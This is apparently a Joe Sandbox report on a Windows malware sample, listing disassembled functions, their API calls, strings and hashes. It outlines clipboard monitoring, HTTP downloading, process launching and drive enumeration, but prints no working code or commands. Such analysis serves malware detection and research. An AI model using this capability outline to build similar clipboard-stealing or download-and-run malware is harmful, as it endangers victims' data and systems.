                                              control_flow_graph 619 405910-405932 GetWindowLongW 620 405934-40593b 619->620 621 405956-40595d 619->621 622 405941-405945 620->622 623 4059c7-4059d8 IsClipboardFormatAvailable 620->623 624 405986-40598c 621->624 625 40595f 621->625 631 405964-405981 SetClipboardViewer SetWindowLongW 622->631 632 405947-40594b 622->632 629 4059e3-4059ed IsClipboardFormatAvailable 623->629 630 4059da-4059e1 623->630 627 4059a6-4059aa 624->627 628 40598e-4059a4 SetWindowLongW 624->628 626 405b44-405b5d DefWindowProcA 625->626 633 4059c2 627->633 634 4059ac-4059bc SendMessageA 627->634 628->633 636 4059f8-405a02 IsClipboardFormatAvailable 629->636 637 4059ef-4059f6 629->637 635 405a0b-405a0f 630->635 631->626 638 405951 632->638 639 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 632->639 633->626 634->633 641 405a15-405a1f OpenClipboard 635->641 642 405adf-405ae3 635->642 636->635 640 405a04 636->640 637->635 638->626 639->626 640->635 641->642 645 405a25-405a36 GetClipboardData 641->645 643 405ae5-405af5 SendMessageA 642->643 644 405afb 642->644 643->644 644->626 646 405a38 645->646 647 405a3d-405a4e GlobalLock 645->647 646->626 648 405a50 647->648 649 405a55-405a66 647->649 648->626 650 405a68-405a6c 649->650 651 405a89-405a9c call 405630 649->651 652 405a9e-405aae call 405750 650->652 653 405a6e-405a72 650->653 659 405ab1-405ac5 GlobalUnlock CloseClipboard 651->659 652->659 655 405a74 653->655 656 405a76-405a87 call 405510 653->656 655->659 656->659 659->642 662 405ac7-405adc call 4048a0 call 40a740 659->662 662->642
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                              • SetClipboardViewer.USER32(?), ref: 00405968
                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                              • OpenClipboard.USER32(00000000), ref: 00405A17
                                              • GetClipboardData.USER32(00000000), ref: 00405A29
                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                              • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                              • String ID:
                                              • API String ID: 3549449529-0
                                              • Opcode ID: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction ID: 140c23de002baebc09e84a4b6840f2c6f62578de50faf7348504d1cb8e8204ab
                                              • Opcode Fuzzy Hash: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction Fuzzy Hash: 80710C75A00608EFDF14DFA4D988BAFB7B4EB48300F10856AE506B7290D7799A40CF69
                                              Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                              • String ID: PCOI$ilci
                                              • API String ID: 2403999931-3762367603
                                              • Opcode ID: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction ID: 5b8540bf1bb466d15bf787bf2847de779fcfe5b3cc035b7f1a74ac98c73710f1
                                              • Opcode Fuzzy Hash: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction Fuzzy Hash: D731A875900705ABC710EF70EC48B97B7B8BF08710F048A2AF559A3691C779F894CB98
                                              Function 00405820 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 00405838
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                              • Sleep.KERNEL32(00000001), ref: 00405864
                                              • GetTickCount.KERNEL32 ref: 0040586A
                                              • GetTickCount.KERNEL32 ref: 00405873
                                              • wsprintfW.USER32 ref: 00405886
                                              • RegisterClassExW.USER32(00000030), ref: 00405893
                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                              • TranslateMessage.USER32(?), ref: 004058E5
                                              • DispatchMessageA.USER32(?), ref: 004058EF
                                              • ExitThread.KERNEL32 ref: 00405901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                              • String ID: %x%X$0
                                              • API String ID: 716646876-225668902
                                              • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction ID: 26b7d68298067a6ce37e9ddfddb25a36523320ae21639d5819629e884720d218
                                              • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction Fuzzy Hash: 47212C71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69
                                              Function 0040E150 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 715 40e150-40e1eb memset InternetCrackUrlA InternetOpenA 716 40e1f1-40e224 InternetConnectA 715->716 717 40e367-40e370 715->717 718 40e35a-40e361 InternetCloseHandle 716->718 719 40e22a-40e25a HttpOpenRequestA 716->719 718->717 720 40e260-40e277 HttpSendRequestA 719->720 721 40e34d-40e354 InternetCloseHandle 719->721 722 40e340-40e347 InternetCloseHandle 720->722 723 40e27d-40e281 720->723 721->718 722->721 724 40e336 723->724 725 40e287 723->725 724->722 726 40e291-40e298 725->726 727 40e329-40e334 726->727 728 40e29e-40e2c0 InternetReadFile 726->728 727->722 729 40e2c2-40e2c9 728->729 730 40e2cb 728->730 729->730 731 40e2cd-40e324 call 40a570 memcpy 729->731 730->727 731->726
                                              APIs
                                              • memset.NTDLL ref: 0040E178
                                              • InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E30A
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E347
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E354
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                              • String ID: <$GET
                                              • API String ID: 1205665004-427699995
                                              • Opcode ID: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction ID: 0e0ad4ad31c216dc2eff2ccec99c89ab6a28dd79d12b38366d41975b782ec3ac
                                              • Opcode Fuzzy Hash: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction Fuzzy Hash: 6E511BB5901228ABDB36CB50CC55BE9B7BCAB44705F0444E9A60DAA2C0D7B96BC4CF54
                                              Function 00406B50 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 106sleepthreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                              • GetModuleFileNameW.KERNEL32(00000000,00417500,00000104), ref: 00406B70
                                                • Part of subcall function 0040ED00: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                                • Part of subcall function 0040ED00: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                                • Part of subcall function 0040ED00: CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              • ExitThread.KERNEL32 ref: 00406CDA
                                                • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                              • wsprintfW.USER32 ref: 00406C52
                                              • wsprintfW.USER32 ref: 00406C72
                                              • wsprintfW.USER32 ref: 00406C95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                              • String ID: (%dGB)$%s%s$Unnamed volume
                                              • API String ID: 1650488544-2117135753
                                              • Opcode ID: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction ID: 6971fabc066a78c2b5f4f93c2536245faf55c75ef939042e540841f18162a7fc
                                              • Opcode Fuzzy Hash: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction Fuzzy Hash: 1D419BB1900214BBE714DB94DD55FEE7778BB48700F1081A5F20AB61D0DA785794CF6A
                                              Function 0040ED50 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 755 40ed50-40ed8f CreateFileW 756 40ed95-40edb0 CreateFileMappingW 755->756 757 40eeaa-40eeae 755->757 758 40eea0-40eea4 CloseHandle 756->758 759 40edb6-40edcf MapViewOfFile 756->759 760 40eeb0-40eed0 CreateFileW 757->760 761 40ef04-40ef0a 757->761 758->757 762 40edd5-40edeb GetFileSize 759->762 763 40ee96-40ee9a CloseHandle 759->763 764 40eed2-40eef2 WriteFile CloseHandle 760->764 765 40eef8-40ef01 call 40a740 760->765 766 40edf1-40ee04 call 40cd80 762->766 767 40ee8c-40ee90 UnmapViewOfFile 762->767 763->758 764->765 765->761 766->767 772 40ee0a-40ee19 766->772 767->763 772->767 773 40ee1b-40ee4a call 40c720 772->773 773->767 776 40ee4c-40ee77 call 40aa70 memcmp 773->776 776->767 779 40ee79-40ee85 call 40a740 776->779 779->767
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ED82
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EDA3
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EDC2
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EDDB
                                              • memcmp.NTDLL ref: 0040EE6D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EE90
                                              • CloseHandle.KERNEL32(00000000), ref: 0040EE9A
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEA4
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EEC3
                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EEE8
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEF2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                              • String ID:
                                              • API String ID: 3902698870-0
                                              • Opcode ID: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction ID: 4e6ec57638d856f2454fe90bbc3b1fbf5740e030230db4960ae301055fb20e21
                                              • Opcode Fuzzy Hash: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction Fuzzy Hash: 34515FB4E40208FBDB14DFA4CC49BDFB774AB48704F108569E615B72C0D7B9AA45CB98
                                              Function 0040D860 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0040D866
                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D86D
                                              • GetCurrentThread.KERNEL32 ref: 0040D878
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D87F
                                              • InterlockedExchangeAdd.KERNEL32(0040805F,00000000), ref: 0040D8A2
                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D8D7
                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D922
                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D93E
                                              • Sleep.KERNEL32(00000001), ref: 0040D96E
                                              • GetCurrentThread.KERNEL32 ref: 0040D97D
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F), ref: 0040D984
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                              • String ID:
                                              • API String ID: 3862671961-0
                                              • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction ID: d6bd3df3806ede59070add2f0d7a1f8bc277f5a62d9d5dceae4a540d753efef8
                                              • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction Fuzzy Hash: 80413CB4E00209EBDB14DFE4D848BAEBB75EF44305F10C16AE911A7390D7789A85CF59
                                              Function 0040EF10 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.NTDLL ref: 0040EF1E
                                              • memset.NTDLL ref: 0040EF2E
                                              • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EF67
                                              • Sleep.KERNEL32(000003E8), ref: 0040EF77
                                              • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EF92
                                              • Sleep.KERNEL32(000003E8), ref: 0040EFAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction ID: 2af3465f2ac7e3bdaf7f942b51208d096d5e25dcc258d3f6adac25a8060dddc3
                                              • Opcode Fuzzy Hash: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction Fuzzy Hash: 6F114F71A84308BBEB10DB90DD46FDE7778AB14B00F204125FA09BE2C1D7F56A44C75A
                                              Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                              • setsockopt.WS2_32 ref: 00401F2C
                                              • closesocket.WS2_32(?), ref: 00401F39
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 671207744-0
                                              • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction ID: 8c1e587a25cfc232de2ab0883eb36e20e47ed0b1207a5ae34e006e610dd4584e
                                              • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction Fuzzy Hash: F2519F75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                              Function 0040DE20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                              • Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleeprecvfrom
                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                              • API String ID: 668330359-3973262388
                                              • Opcode ID: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction ID: cf4c7c589cb5a2b5626e628c2cbe2bc4730fcdb76fc9a6090f7a4287b0899cde
                                              • Opcode Fuzzy Hash: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction Fuzzy Hash: C92142B0944218ABDB20CB64DC49BE97774AB14308F1085E9E7197B2C0D7B99ACACF5C
                                              Function 0040EFC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EFD7
                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EFF6
                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F01F
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F048
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F052
                                              • Sleep.KERNEL32(000003E8), ref: 0040F05D
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EFD2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 2743515581-2272513262
                                              • Opcode ID: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction ID: b5bc459e60af10a5ecd3bce89b92fe6334010ad2bd78cd38f87cd536e4e3c5ce
                                              • Opcode Fuzzy Hash: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction Fuzzy Hash: 6821FC74A40208FBDB20DF94CC49FDEB775AB44705F1085A5FA11AB2C1C7B96A44CB59
                                              Function 0040B850 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00417F40,?,?,?,?,?,?,00407FE3), ref: 0040B85B
                                              • CreateFileW.KERNEL32(00417D28,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B8AD
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B8CE
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B8ED
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B902
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B968
                                              • CloseHandle.KERNEL32(00000000), ref: 0040B972
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B97C
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                              • String ID:
                                              • API String ID: 439099756-0
